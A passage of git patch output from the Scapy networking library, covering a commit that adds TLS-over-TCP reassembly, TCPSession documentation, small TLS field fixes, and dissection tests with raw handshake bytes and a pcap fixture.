read_allowed_exceptions: - continue except Exception as ex: msg = " It was closed." try: diff --git a/scapy/supersocket.py b/scapy/supersocket.py index 47efc7f484a..ff80b756757 100644 --- a/scapy/supersocket.py +++ b/scapy/supersocket.py @@ -60,7 +60,6 @@ class SuperSocket(six.with_metaclass(_SuperSocket_metaclass)): desc = None closed = 0 nonblocking_socket = False - read_allowed_exceptions = () auxdata_available = False def __init__(self, family=socket.AF_INET, type=socket.SOCK_STREAM, proto=0): # noqa: E501 diff --git a/scapy/utils.py b/scapy/utils.py index 2c6232b803f..8d7d68ee5c7 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -1012,7 +1012,6 @@ def open(filename): class RawPcapReader(six.with_metaclass(PcapReader_metaclass)): """A stateful pcap reader. Each packet is returned as a string""" - read_allowed_exceptions = () # emulate SuperSocket nonblocking_socket = True PacketMetadata = collections.namedtuple("PacketMetadata", ["sec", "usec", "wirelen", "caplen"]) # noqa: E501 From bf0725f13ca7a1d9f382a72125b5bca25197171d Mon Sep 17 00:00:00 2001 From: Gabriel Date: Tue, 18 Aug 2020 16:19:16 +0200 Subject: [PATCH 0253/1632] Minor TLS fixes (#2767) * Improve doc * TLS TCP decompression & small bugs * Add TLS tests * Fix issue #2767 2527 --- doc/scapy/usage.rst | 39 ++++++++++++++++++++--- scapy/layers/tls/automaton_cli.py | 24 ++++++++------ scapy/layers/tls/extensions.py | 6 ++-- scapy/layers/tls/handshake.py | 33 ++++++++++++------- scapy/layers/tls/keyexchange.py | 4 +-- scapy/layers/tls/session.py | 19 +++++++++++ scapy/sendrecv.py | 6 +++- scapy/sessions.py | 22 +++++++++---- test/pcaps/tls_tcp_frag.pcap.gz | Bin 0 -> 3179 bytes test/tls.uts | 51 ++++++++++++++++++++++++++++++ test/tls/tests_tls_netaccess.uts | 1 + 11 files changed, 167 insertions(+), 38 deletions(-) create mode 100644 test/pcaps/tls_tcp_frag.pcap.gz diff --git a/doc/scapy/usage.rst b/doc/scapy/usage.rst index 850ff102666..f7ac1e952ee 100644 --- a/doc/scapy/usage.rst +++ b/doc/scapy/usage.rst @@ -758,10 +758,12 @@ Advanced Sniffing - Sniffing Sessions Scapy includes some basic Sessions, but it is possible to implement your own. Available by default: -- ``IPSession`` -> *defragment IP packets* on-the-flow, to make a stream usable by ``prn``. -- ``TCPSession`` -> *defragment certain TCP protocols**. Only **HTTP 1.0** currently uses this functionality. -- ``TLSSession`` -> *matches TLS sessions* on the flow. -- ``NetflowSession`` -> *resolve Netflow V9 packets* from their NetflowFlowset information objects +- :py:class:`~scapy.sessions.IPSession` -> *defragment IP packets* on-the-flow, to make a stream usable by ``prn``. +- :py:class:`~scapy.sessions.TCPSession` -> *defragment certain TCP protocols*. Currently supports: + - HTTP 1.0 + - TLS +- :py:class:`~scapy.sessions.TLSSession` -> *matches TLS sessions* on the flow. +- :py:class:`~scapy.sessions.NetflowSession` -> *resolve Netflow V9 packets* from their NetflowFlowset information objects Those sessions can be used using the ``session=`` parameter of ``sniff()``. Examples:: @@ -771,7 +773,34 @@ Those sessions can be used using the ``session=`` parameter of ``sniff()``. Exam .. note:: To implement your own Session class, in order to support another flow-based protocol, start by copying a sample from `scapy/sessions.py `_ - Your custom ``Session`` class only needs to extend the ``DefaultSession`` class, and implement a ``on_packet_received`` function, such as in the example. + Your custom ``Session`` class only needs to extend the :py:class:`~scapy.sessions.DefaultSession` class, and implement a ``on_packet_received`` function, such as in the example. + +.. note:: Would you need it, you can use: ``class TLS_over_TCP(TLSSession, TCPSession): pass`` to sniff TLS packets that are defragmented. + +How to use TCPSession to defragment TCP packets +^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + +The layer on which the decompression is applied must be immediately following the TCP layer. You need to implement a class function called ``tcp_reassemble`` that accepts the binary data and a metada dictionary as argument and returns, when full, a packet. Let's study the (pseudo) example of TLS: + +.. code:: + + class TLS(Packet): + [...] + + @classmethod + def tcp_reassemble(cls, data, metadata): + length = struct.unpack("!H", data[3:5])[0] + 5 + if len(data) == length: + return TLS(data) + + +In this example, we first get the total length of the TLS payload announced by the TLS header, and we compare it to the length of the data. When the data reaches this length, the packet is complete and can be returned. When implementing ``tcp_reassemble``, it's usually a matter of detecting when a packet isn't missing anything else. + +The ``data`` argument is bytes and the ``metadata`` argument is a dictionary which keys are as follow: + +- ``metadata["pay_class"]``: the TCP payload class (here TLS) +- ``metadata.get("tcp_psh", False)``: will be present if the PUSH flag is set +- ``metadata.get("tcp_end", False)``: will be present if the END or RESET flag is set Filters ------- diff --git a/scapy/layers/tls/automaton_cli.py b/scapy/layers/tls/automaton_cli.py index 8449ec8bb29..a52a1bbca14 100644 --- a/scapy/layers/tls/automaton_cli.py +++ b/scapy/layers/tls/automaton_cli.py @@ -84,15 +84,21 @@ class TLSClientAutomaton(_TLSAutomaton): Rather than with an interruption, the best way to stop this client is by typing 'quit'. This won't be a message sent to the server. - _'mycert' and 'mykey' may be provided as filenames. They will be used in - the handshake, should the server ask for client authentication. - _'server_name' is the SNI. It does not need to be set. - _'client_hello' may hold a TLSClientHello or SSLv2ClientHello to be sent - to the server. This is particularly useful for extensions tweaking. - _'version' is a quicker way to advertise a protocol version ("sslv2", - "tls1", "tls12", etc.) It may be overridden by the previous 'client_hello'. - _'data' is a list of raw data to be sent to the server once the handshake - has been completed. Both 'stop_server' and 'quit' will work this way. + :param server: the server IP or hostname. defaults to 127.0.0.1 + :param dport: the server port. defaults to 4433 + :param server_name: the SNI to use. It does not need to be set + :param mycert: + :param mykey: may be provided as filenames. They will be used in + the handshake, should the server ask for client authentication. + :param client_hello: may hold a TLSClientHello or SSLv2ClientHello to be + sent to the server. This is particularly useful for extensions + tweaking. + :param version: is a quicker way to advertise a protocol version ("sslv2", + "tls1", "tls12", etc.) It may be overridden by the previous + 'client_hello'. + :param data: is a list of raw data to be sent to the server once the + handshake has been completed. Both 'stop_server' and 'quit' will + work this way. """ def parse_args(self, server="127.0.0.1", dport=4433, server_name=None, diff --git a/scapy/layers/tls/extensions.py b/scapy/layers/tls/extensions.py index ad5722b6e37..8e1e8da9189 100644 --- a/scapy/layers/tls/extensions.py +++ b/scapy/layers/tls/extensions.py @@ -761,7 +761,7 @@ def addfield(self, pkt, s, i): i = self.adjust(pkt, f) if i == 0: # for correct build if no ext and not explicitly 0 v = pkt.tls_session.tls_version - # Xith TLS 1.3, zero lengths are always explicit. + # With TLS 1.3, zero lengths are always explicit. if v is None or v < 0x0304: return s else: @@ -779,8 +779,8 @@ def i2len(self, pkt, i): return len(self.i2m(pkt, i)) def getfield(self, pkt, s): - tmp_len = self.length_from(pkt) - if tmp_len is None: + tmp_len = self.length_from(pkt) or 0 + if tmp_len <= 0: return s, [] return s[tmp_len:], self.m2i(pkt, s[:tmp_len]) diff --git a/scapy/layers/tls/handshake.py b/scapy/layers/tls/handshake.py index d7a60f734ca..664729dd601 100644 --- a/scapy/layers/tls/handshake.py +++ b/scapy/layers/tls/handshake.py @@ -17,9 +17,21 @@ import struct from scapy.error import log_runtime, warning -from scapy.fields import ByteEnumField, ByteField, EnumField, Field, \ - FieldLenField, IntField, PacketField, PacketListField, ShortField, \ - StrFixedLenField, StrLenField, ThreeBytesField, UTCTimeField +from scapy.fields import ( + ByteEnumField, + ByteField, + Field, + FieldLenField, + IntField, + PacketField, + PacketListField, + ShortEnumField, + ShortField, + StrFixedLenField, + StrLenField, + ThreeBytesField, + UTCTimeField, +) from scapy.compat import hex_bytes, orb, raw from scapy.config import conf @@ -481,7 +493,7 @@ class TLSServerHello(_TLSHandshake): _SessionIDField("sid", "", length_from=lambda pkt: pkt.sidlen), - EnumField("cipher", None, _tls_cipher_suites), + ShortEnumField("cipher", None, _tls_cipher_suites), _CompressionMethodsField("comp", [0], _tls_compression_algs, itemfmt="B", @@ -489,10 +501,9 @@ class TLSServerHello(_TLSHandshake): _ExtensionsLenField("extlen", None, length_of="ext"), _ExtensionsField("ext", None, - length_from=lambda pkt: (pkt.msglen - - (pkt.sidlen or 0) - # noqa: E501 - 38))] - # 40)) ] + length_from=lambda pkt: ( + pkt.msglen - (pkt.sidlen or 0) - 40 + ))] @classmethod def dispatch_hook(cls, _pkt=None, *args, **kargs): @@ -563,7 +574,7 @@ def tls_session_update(self, msg_str): FieldLenField("sidlen", None, length_of="sid", fmt="B"), _SessionIDField("sid", "", length_from=lambda pkt: pkt.sidlen), - EnumField("cipher", None, _tls_cipher_suites), + ShortEnumField("cipher", None, _tls_cipher_suites), _CompressionMethodsField("comp", [0], _tls_compression_algs, itemfmt="B", @@ -1020,7 +1031,7 @@ def build(self, *args, **kargs): fval = self.getfieldval("sig") if fval is None: s = self.tls_session - if s.pwcs: + if s.pwcs and s.client_random: if not s.pwcs.key_exchange.anonymous: p = self.params if p is None: @@ -1126,7 +1137,7 @@ class TLSCertificateRequest(_TLSHandshake): SigAndHashAlgsLenField("sig_algs_len", None, length_of="sig_algs"), SigAndHashAlgsField("sig_algs", [0x0403, 0x0401, 0x0201], - EnumField("hash_sig", None, _tls_hash_sig), # noqa: E501 + ShortEnumField("hash_sig", None, _tls_hash_sig), # noqa: E501 length_from=lambda pkt: pkt.sig_algs_len), # noqa: E501 FieldLenField("certauthlen", None, fmt="!H", length_of="certauth"), diff --git a/scapy/layers/tls/keyexchange.py b/scapy/layers/tls/keyexchange.py index 222f68b0e1e..f20845b9a74 100644 --- a/scapy/layers/tls/keyexchange.py +++ b/scapy/layers/tls/keyexchange.py @@ -272,7 +272,7 @@ def m2i(self, pkt, m): if s.prcs: cls = s.prcs.key_exchange.server_kx_msg_cls(m) if cls is None: - return None, Raw(m[:tmp_len]) / Padding(m[tmp_len:]) + return Raw(m[:tmp_len]) / Padding(m[tmp_len:]) return cls(m, tls_session=s) else: try: @@ -284,7 +284,7 @@ def m2i(self, pkt, m): cls = _tls_server_ecdh_cls_guess(m) p = cls(m, tls_session=s) if pkcs_os2ip(p.load[:2]) not in _tls_hash_sig: - return None, Raw(m[:tmp_len]) / Padding(m[tmp_len:]) + return Raw(m[:tmp_len]) / Padding(m[tmp_len:]) return p diff --git a/scapy/layers/tls/session.py b/scapy/layers/tls/session.py index 17d703bee26..fbc912d6855 100644 --- a/scapy/layers/tls/session.py +++ b/scapy/layers/tls/session.py @@ -1002,6 +1002,25 @@ def mysummary(self): return "TLS %s / %s" % (repr(self.tls_session), getattr(self, "_name", self.name)) + @classmethod + def tcp_reassemble(cls, data, metadata): + # Used with TLSSession + from scapy.layers.tls.record import TLS + from scapy.layers.tls.record_tls13 import TLS13 + if cls in (TLS, TLS13): + length = struct.unpack("!H", data[3:5])[0] + 5 + if len(data) == length: + return cls(data) + elif len(data) > length: + pkt = cls(data) + if hasattr(pkt.payload, "tcp_reassemble"): + if pkt.payload.tcp_reassemble(data[length:], metadata): + return pkt + else: + return pkt + else: + return cls(data) + ############################################################################### # Multiple TLS sessions # diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index 05bfeb6a382..a9cdbeae1c2 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -752,7 +752,8 @@ class AsyncSniffer(object): is displayed. --Ex: prn = lambda x: x.summary() session: a session = a flow decoder used to handle stream of packets. - e.g: IPSession (to defragment on-the-flow) or NetflowSession + --Ex: session=TCPSession + See below for more details. filter: BPF filter to apply. lfilter: Python function applied to each packet to determine if further action may be done. @@ -778,6 +779,9 @@ class AsyncSniffer(object): element, a list of elements, or a dict object mapping an element to a label (see examples below). + For more information about the session argument, see + https://scapy.rtfd.io/en/latest/usage.html#advanced-sniffing-sniffing-sessions + Examples: synchronous >>> sniff(filter="arp") >>> sniff(filter="tcp", diff --git a/scapy/sessions.py b/scapy/sessions.py index e6a59247c09..a2a823e83bb 100644 --- a/scapy/sessions.py +++ b/scapy/sessions.py @@ -194,10 +194,12 @@ def tcp_reassemble(cls, data, metadata): # as you need additional data. return None - A (hard to understand) example can be found in scapy/layers/http.py + For more details and a real example, see: + https://scapy.readthedocs.io/en/latest/usage.html#how-to-use-tcpsession-to-defragment-tcp-packets :param app: Whether the socket is on application layer = has no TCP - layer. Default to False + layer. This is used for instance if you are using a native + TCP socket. Default to False """ fmt = ('TCP {IP:%IP.src%}{IPv6:%IPv6.src%}:%r,TCP.sport% > ' + @@ -224,7 +226,8 @@ def _process_packet(self, pkt): # Special mode: Application layer. Use on top of TCP pay_class = pkt.__class__ if not hasattr(pay_class, "tcp_reassemble"): - # Cannot tcp-reassemble + # Being on top of TCP, we have no way of knowing + # when a packet ends. return pkt self.data += bytes(pkt) pkt = pay_class.tcp_reassemble(self.data, self.metadata) @@ -248,12 +251,16 @@ def _process_packet(self, pkt): # Let's guess which class is going to be used if "pay_class" not in metadata: pay_class = pay.__class__ - if not hasattr(pay_class, "tcp_reassemble"): - # Cannot tcp-reassemble + if hasattr(pay_class, "tcp_reassemble"): + tcp_reassemble = pay_class.tcp_reassemble + else: + # We can't know for sure when a packet ends. + # Ignore. return pkt metadata["pay_class"] = pay_class + metadata["tcp_reassemble"] = tcp_reassemble else: - pay_class = metadata["pay_class"] + tcp_reassemble = metadata["tcp_reassemble"] # Get a relative sequence number for a storage purpose relative_seq = metadata.get("relative_seq", None) if relative_seq is None: @@ -275,10 +282,11 @@ def _process_packet(self, pkt): packet = None if data.full(): # Reassemble using all previous packets - packet = pay_class.tcp_reassemble(bytes(data), metadata) + packet = tcp_reassemble(bytes(data), metadata) # Stack the result on top of the previous frames if packet: data.clear() + metadata.clear() del self.tcp_frags[ident] pay.underlayer.remove_payload() if IP in pkt: diff --git a/test/pcaps/tls_tcp_frag.pcap.gz b/test/pcaps/tls_tcp_frag.pcap.gz new file mode 100644 index 0000000000000000000000000000000000000000..166fca06cf6750feb1bfbaa473ae03648d6308fc GIT binary patch literal 3179 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 RODz0q^=~Dd;l*hW0080oJe&Xk literal 0 HcmV?d00001 diff --git a/test/tls.uts b/test/tls.uts index 6d5da7872c3..8776910a3b0 100644 --- a/test/tls.uts +++ b/test/tls.uts @@ -1244,9 +1244,14 @@ test_tls_without_cryptography() = Truncated TCP segment +dd = conf.debug_dissector +conf.debug_dissector = False + pkt = Ether(hex_bytes('00155dfb587a00155dfb58430800450005dc54d3400070065564400410d40a00000d01bb044e8b86744e16063ac45010faf06ba9000016030317c30200005503035cb336a067d53a5d2cedbdfec666ac740afbd0637ddd13eddeab768c3c63abee20981a0000d245f1c905b329323ad67127cd4b907a49f775c331d0794149aca7cdc02800000d0005000000170000ff010001000b000ec6000ec300090530820901308206e9a00302010202132000036e72aded906765595fae000000036e72300d06092a864886f70d01010b050030818b310b30090603550406130255533113')) assert TLSServerHello in pkt +conf.debug_dissector = dd + ############################################################################### ########################### TLS Misc tests #################################### ############################################################################### @@ -1362,6 +1367,52 @@ assert TLSCertificateVerify in t assert t[TLSCertificateVerify].sig.sig_len == 72 += Test complex TLSServerKeyExchange dissection & build + +a = b'\x16\x03\x03\x0e4\x02\x00\x00M\x03\x03^\xfa\xb5~\x88\xdf\xdc#}\'\xa0\xff\xa2\xe2\xb5\xec\x0e\x93\xa8\xe0\xde\x01[\x13[F\x151 x\xc6\xcc `)\x00\x00\x8aZ\x90l\xda\x0b\xe1\xec[i\x13\xa7\x8e\xb9a\x98"\x8a7L\x9d\x90\xe0\x01\x06c$9\xc0\'\x00\x00\x05\xff\x01\x00\x01\x00\x0b\x00\x0c\x8e\x00\x0c\x8b\x00\x06n0\x82\x06j0\x82\x05R\xa0\x03\x02\x01\x02\x02\x10EY\xe8\x1c\x1e\x9a\xe0?X\xaa\xc3\xbc\xcd`jh0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x0b\x05\x000\x81\x8f1\x0b0\t\x06\x03U\x04\x06\x13\x02GB1\x1b0\x19\x06\x03U\x04\x08\x13\x12Greater Manchester1\x100\x0e\x06\x03U\x04\x07\x13\x07Salford1\x180\x16\x06\x03U\x04\n\x13\x0fSectigo Limited1705\x06\x03U\x04\x03\x13.Sectigo RSA Domain Validation Secure Server CA0\x1e\x17\r190309000000Z\x17\r210308235959Z0W1!0\x1f\x06\x03U\x04\x0b\x13\x18Domain Control Validated1\x1d0\x1b\x06\x03U\x04\x0b\x13\x14PositiveSSL Wildcard1\x130\x11\x06\x03U\x04\x03\x0c\n*.mql5.net0\x82\x01"0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x01\x05\x00\x03\x82\x01\x0f\x000\x82\x01\n\x02\x82\x01\x01\x00\xcb\xbcn=\xbaGd\xe1XB\x07\xc9\xb1\xc8/\x86\xaa4Z\xbdNk\xfb\xffR\x8f\xe4\x1c^\x91m8\xb9^\x97\xa5\xd3N\xfb\x80\x92\x8ap\xda\x15\x9f\xee\xe7\xb3\xc8?\xb0>~\xaa\x07\x91\xb1\x99q\xe2\xe5\xc8\x9b\x1d5\xa0\x96,\x98\xdaW\x93\x95\x8e%\xe8\xd4L\xeb\xcbSg\x15"\xba\xb7\xc7\x1f\xe9\xd6\x1a\xe6E\x1d\xc8\x1e%\xd36\xe0/r\xd1\xce1C\xce\x91&\xa1\x08*R\xbf\x8cu\xb0\xda\x0e\x1e2\xd66\x1df&3\x9b\x03\x0b\xcam:\xf7\x12\xd9ud(\xae\xdc\xbci\x85\xbd\xcf\xeb{\x15:\xbd\x0e\x11\x1bi\xd8\xff]y~E\x15\x95\xee\xe9\xea\xc6Cr!=~y0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x0b\x05\x00\x03\x82\x01\x01\x00\x17\x7f\x18\x82[\t\x18@R@\xa6\xb7\xc5[\xf1su\xc7\x8cG?\xf7\x91\xe2E]\x1b\x7f\xc3su\x88\xb6\x17t\xc3\x8b\xb1g\xd2\x06\xfc\x82\x84\x8d\xbb\x13\xc1\x8c\xf71\xc0>(?\xa3\xf0P\x14Z\x8a\x97\x9c\xa3\xb1!ddy\xa3 .\xdb\xd3\xfb\xa6\x0b\xf7k\xdbP\xb48\xeb\xc7\x90\x00\xa9\x90\xa4\x9d\xbf\x9c\xa7\n\x8e\x90\xfe\x8f\xa3\x95Th\xe6,\xdd\xde\xde\x06\x0b\x8e+\xf5\xca\x85>n\xbf\xd87\xff\xe3\xd2|*\xc0\x89\x07\x95\xbeV\x90:lG[\xf0\xadUF\xa1\x88nmj\xbb\xa9\x16\x90\xdd\x84\xe4\xbf\xe7\xe8\xe3"\xd4+0\xa0d\xdc.\x8e\x85+\xbd\x99\xd8\x02\xa7K}\xb1\xc4\xed;\xe2\xaf\x81R\xceJ\xb9iZ\xec\xda\x8f`\x8eI\xf6]\x83-\x9e\xa7{]\x02\x9d\x1fh\xf4\xef\x14\xf4\xb3\x0e\r\xe6\x9b\x9d\x96\xb4\x90iWA\xe0\xf4\x1d_\xbeRD\x15a;?\t\x8c\x8f6\xea!\xf2\xd6/Yg\x82e/5\xe1\xb4\xa1\x94\xef\xd7\x94\x82\x04\x00\x06\x170\x82\x06\x130\x82\x03\xfb\xa0\x03\x02\x01\x02\x02\x10}[Q&\xb4v\xba\x11\xdbt\x16\x0b\xbcS\r\xa70\r\x06\t*\x86H\x86\xf7\r\x01\x01\x0c\x05\x000\x81\x881\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x130\x11\x06\x03U\x04\x08\x13\nNew Jersey1\x140\x12\x06\x03U\x04\x07\x13\x0bJersey City1\x1e0\x1c\x06\x03U\x04\n\x13\x15The USERTRUST Network1.0,\x06\x03U\x04\x03\x13%USERTrust RSA Certification Authority0\x1e\x17\r181102000000Z\x17\r301231235959Z0\x81\x8f1\x0b0\t\x06\x03U\x04\x06\x13\x02GB1\x1b0\x19\x06\x03U\x04\x08\x13\x12Greater Manchester1\x100\x0e\x06\x03U\x04\x07\x13\x07Salford1\x180\x16\x06\x03U\x04\n\x13\x0fSectigo Limited1705\x06\x03U\x04\x03\x13.Sectigo RSA Domain Validation Secure Server CA0\x82\x01"0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x01\x05\x00\x03\x82\x01\x0f\x000\x82\x01\n\x02\x82\x01\x01\x00\xd6s3\xd6\xd7< \xd0\x00\xd2\x17E\xb8\xd6>\x07\xa2?\xc7A\xee20\xc9\xb0l\xfd\xf4\x9f\xcb\x12\x98\x0f-?\x8dM\x01\x0c\x82\x0f\x17\x7fb.\xe9\xb8Hy\xfb\x16\x83N\xad\xd72%\x93\xb7\x07\xbf\xb9P?\xa9L\xc3@*\xe99\xff\xd9\x81\xca\x1f\x162A\xda\x80&\xb9#z\x87 \x1e\xe3\xff \x9a<\x95Do\x87u\x06\x90@\xb42\x93\x16\t\x10\x08#>\xd2\xdd\x87\x0fo]Q\x14j\ni\xc5O\x01ri\xcf\xd3\x93Lm\x04\xa0\xa3\x1b\x82~\xb1\x9a\xb9\xed\xc5\x9e\xc57x\x9f\x9a\x084\xfbV.X\xc4\t\x0e\x06d[\xbc7\xdc\xf1\x9f(h\xa8V\xb0\x92\xa3\\\x9f\xbb\x88\x98\x08\x1b$\x1d\xab0\x85\xae\xaf\xb0.\x9ez\x9d\xc1\xc0B\x1c\xe2\x02\xf0\xea\xe0J\xd2\xef\x90\x0e\xb4\xc1@\x16\xf0o\x85BJd\xf7\xa40\xa0\xfe\xbf.\xa3\'Z\x8e\x8bX\xb8\xad\xc3\x19\x17\x84c\xedoV\xfd\x83\xcb`4\xc4t\xbe\xe6\x9d\xdb\xe1\xe4\xe5\xca\x0c_\x15\x02\x03\x01\x00\x01\xa3\x82\x01n0\x82\x01j0\x1f\x06\x03U\x1d#\x04\x180\x16\x80\x14Sy\xbfZ\xaa+J\xcfT\x80\xe1\xd8\x9b\xc0\x9d\xf2\xb2\x03f\xcb0\x1d\x06\x03U\x1d\x0e\x04\x16\x04\x14\x8d\x8c^\xc4T\xad\x8a\xe1w\xe9\x9b\xf9\x9b\x05\xe1\xb8\x01\x8da\xe10\x0e\x06\x03U\x1d\x0f\x01\x01\xff\x04\x04\x03\x02\x01\x860\x12\x06\x03U\x1d\x13\x01\x01\xff\x04\x080\x06\x01\x01\xff\x02\x01\x000\x1d\x06\x03U\x1d%\x04\x160\x14\x06\x08+\x06\x01\x05\x05\x07\x03\x01\x06\x08+\x06\x01\x05\x05\x07\x03\x020\x1b\x06\x03U\x1d \x04\x140\x120\x06\x06\x04U\x1d \x000\x08\x06\x06g\x81\x0c\x01\x02\x010P\x06\x03U\x1d\x1f\x04I0G0E\xa0C\xa0A\x86?http://crl.usertrust.com/USERTrustRSACertificationAuthority.crl0v\x06\x08+\x06\x01\x05\x05\x07\x01\x01\x04j0h0?\x06\x08+\x06\x01\x05\x05\x070\x02\x863http://crt.usertrust.com/USERTrustRSAAddTrustCA.crt0%\x06\x08+\x06\x01\x05\x05\x070\x01\x86\x19http://ocsp.usertrust.com0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x0c\x05\x00\x03\x82\x02\x01\x002\xbfa\xbd\x0eH\xc3O\xc7\xbaGM\xf8\x9cx\x19\x01\xdc\x13\x1d\x80o\xfc\xc3p\xb4R\x9a13\x9aWR\xfb1\x9ek\xa4\xefT\xaa\x89\x8d@\x17h\xf8\x11\x10|\xd2\xca\xb1\xf1U\x86\xc7\xee\xb36\x91\x86\xf69Q\xbfF\xbf\x0f\xa0\xba\xb4\xf7~I\xc4*6\x17\x9e\xe4h9z\xaf\x94NVo\xb2{;\xbf\n\x86\xbd\xcd\xc5w\x1c\x03\xb88\xb1\xa2\x1f_~\xdb\x8a\xdcFH\xb6h\n\xcf\xb2\xb5\xb4\xe24\xe4g\xa98f\t^\xd2\xb8\xfc\x9d(:\x17@\'\xc2rN)\xfd!<|\xcf\x13\xfb\x96,\xc51D\xfd\x13\xed\xd5\x9b\xa9ihw|\xee\xe1\xff\xa4\xf968\x08S9\xa2\x844\x9c\x19\xf3\xbe\x0e\xac\xd5$7\xeb#\xa8x\xd0\xd3\xe7\xef\x92Gdb9"\xef\xc6\xf7\x11\xbe"\x85\xc6fD$&\x8e\x102\x8d\xc8\x93\xae\x07\x9e\x83>/\xd9\xf9\xf5F\x8ec\xbe\xc1\xe6\xb4\xdc\xa6\xcd!\xa8\x86\n\x95\xd9.\x85&\x1a\xfd\xfc\xb1\xb6WBm\x95\xd13\xf69\x14\x06\x82A8\xf5\x8fX\xdc\x80[\xa4\xd5}\x95x\xfd\xa7\x9b\xff\xfd\xc5\xa8i\xab&\xe7\xa7\xa4\x05\x87[\xa9\xb7\xb8\xa3 